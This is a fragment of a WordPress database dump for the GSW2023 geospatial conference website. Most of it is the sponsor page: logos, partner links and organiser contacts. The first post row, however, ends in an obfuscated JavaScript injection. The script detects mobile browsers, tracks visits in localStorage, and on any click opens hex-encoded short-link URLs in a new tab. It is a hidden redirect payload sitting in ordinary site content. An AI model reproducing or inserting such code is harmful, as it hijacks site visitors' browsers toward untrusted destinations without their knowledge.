_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:26:55','2023-08-16 00:26:55','',3066,'https://gsw2023.com/?p=5251',0,'revision','',0),
(5252,1,'2023-08-16 00:27:25','2023-08-16 00:27:25','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145539008{margin-top: -50px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145507665{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text 